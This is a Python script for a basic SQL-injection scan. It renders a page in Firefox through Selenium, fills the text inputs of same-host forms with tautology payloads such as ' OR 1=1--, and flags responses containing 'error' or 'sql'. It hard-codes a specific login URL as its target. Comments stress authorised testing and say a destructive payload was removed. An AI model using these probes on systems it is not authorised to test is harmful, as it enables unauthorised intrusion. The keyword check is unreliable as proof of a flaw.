import requests
import time
from bs4 import BeautifulSoup
from selenium import webdriver
from selenium.webdriver.firefox.service import Service
from selenium.webdriver.firefox.options import Options
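def fetch_full_html(url):
    """Return the HTML of *url* as rendered by a local Firefox instance.

    The page is opened through Selenium's Firefox driver so that markup
    produced by client-side scripts is included in the returned source.

    Args:
        url: Address of the page to load.

    Returns:
        The page source reported by the driver after a fixed pause.

    Note:
        The driver and browser locations are hard-coded Windows paths.
        The target's scripts execute in a real browser on the machine
        running the scan, so run it from a disposable or isolated host.
    """
    service = Service("C:\\Python312\\geckodriver.exe")
    options = Options()
    options.binary_location = "C:\\Program Files\\Mozilla Firefox\\firefox.exe"
    driver = webdriver.Firefox(service=service, options=options)
    try:
        driver.get(url)
        # Fixed pause that gives client-side rendering time to finish.
        time.sleep(3)
        return driver.page_source
    finally:
        # Always shut the browser down, even when navigation fails;
        # otherwise every failed scan leaves a Firefox process behind.
        driver.quit()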
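def test_request():
    """Fetch the module-level ``url`` and print the page title.

    Reads the global ``url`` assigned in the ``__main__`` block. Request
    failures (including HTTP error statuses raised by
    ``raise_for_status``) are reported on stdout instead of propagating.
    """
    print("=== Test requête ===")
    try:
        # A timeout keeps an unresponsive target from hanging the scan.
        response = requests.get(url, timeout=10)
        response.raise_for_status()  # e.g. raises on a 404
        soup = BeautifulSoup(response.text, 'html.parser')
        # A page without a <title> element makes soup.title None; guard it
        # so the check does not die with an AttributeError.
        title = soup.title.string if soup.title is not None else None
        print(f"Le titre de la page {url} est : '{title}'")
    except requests.exceptions.RequestException as e:
        print("Erreur lors de la requête :", e)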
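def test_sql_injection(url):
    """Submit SQL-injection probes to the text inputs of each form on *url*.

    The page is rendered with ``fetch_full_html``, every ``<form>`` is
    collected, and each probe string is sent in all named inputs of type
    ``text``. A response is reported as potentially vulnerable when its
    body contains ``error`` or ``sql`` (case-insensitive).

    Args:
        url: Page to scan. Only run this against a target you are
            authorised to test.

    Results are printed to stdout. ``requests`` errors are reported and
    end the scan; nothing is returned.
    """
    from urllib.parse import urljoin, urlsplit

    # Detection probes must be non-destructive: the stacked-query payload
    # that dropped a table was removed, since on a vulnerable target it
    # would destroy data instead of merely revealing the flaw.
    sql_payloads = ["' OR '1'='1", "' OR 'a'='a", "' OR 1=1--"]
    target_host = urlsplit(url).netloc
    try:
        html = fetch_full_html(url)
        soup = BeautifulSoup(html, 'html.parser')
        forms = soup.find_all("form")
        print(f"Formulaires trouvés sur {url}: {len(forms)}")
        for form in forms:
            form_action = form.attrs.get("action", "")
            form_method = form.attrs.get("method", "get").lower()

            # Resolve the action against the page URL. Plain string
            # concatenation breaks on absolute or root-relative actions
            # and on page URLs that carry a fragment.
            form_url = urljoin(url, form_action)

            # Stay inside the authorised scope: a form may post to another
            # host, and probes must never be sent to a third party.
            if urlsplit(form_url).netloc != target_host:
                print(f"Formulaire ignoré (hors périmètre autorisé) : {form_url}")
                continue

            # The injectable field names do not depend on the payload, so
            # collect them once per form.
            text_fields = []
            for input_tag in form.find_all("input"):
                input_name = input_tag.attrs.get("name")
                input_type = input_tag.attrs.get("type", "text")
                if input_name and input_type == "text":
                    text_fields.append(input_name)

            for payload in sql_payloads:
                form_data = dict.fromkeys(text_fields, payload)
                # Timeouts keep a stalled endpoint from blocking the scan.
                if form_method == "post":
                    response = requests.post(form_url, data=form_data, timeout=10)
                else:
                    response = requests.get(form_url, params=form_data, timeout=10)

                # NOTE(review): matching "error"/"sql" anywhere in the body
                # is a weak signal. A page that always contains either word
                # is flagged for every payload, so treat a hit as a lead to
                # verify manually, not as a confirmed finding.
                body = response.text.lower()
                if "error" in body or "sql" in body:
                    print(f"Vulnérabilité potentielle d'injection SQL détectée avec le payload '{payload}' dans {form_url}")
                else:
                    print(f"Aucune vulnérabilité détectée avec le payload '{payload}' dans {form_url}")
    except requests.exceptions.RequestException as e:
        print("Erreur lors de la requête :", e)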
if __name__ == "__main__":
    # Set this to the URL of a target you have explicit permission to test.
    # NOTE(review): the part after '#' is a client-side fragment; it is not
    # sent in the HTTP request made by test_request(), only the browser
    # started by fetch_full_html() acts on it.
    url = "https://13-air-ajtd.rxq.ch/#/login"

    # test_request() reads the module-level `url` assigned above.
    test_request()
    test_sql_injection(url)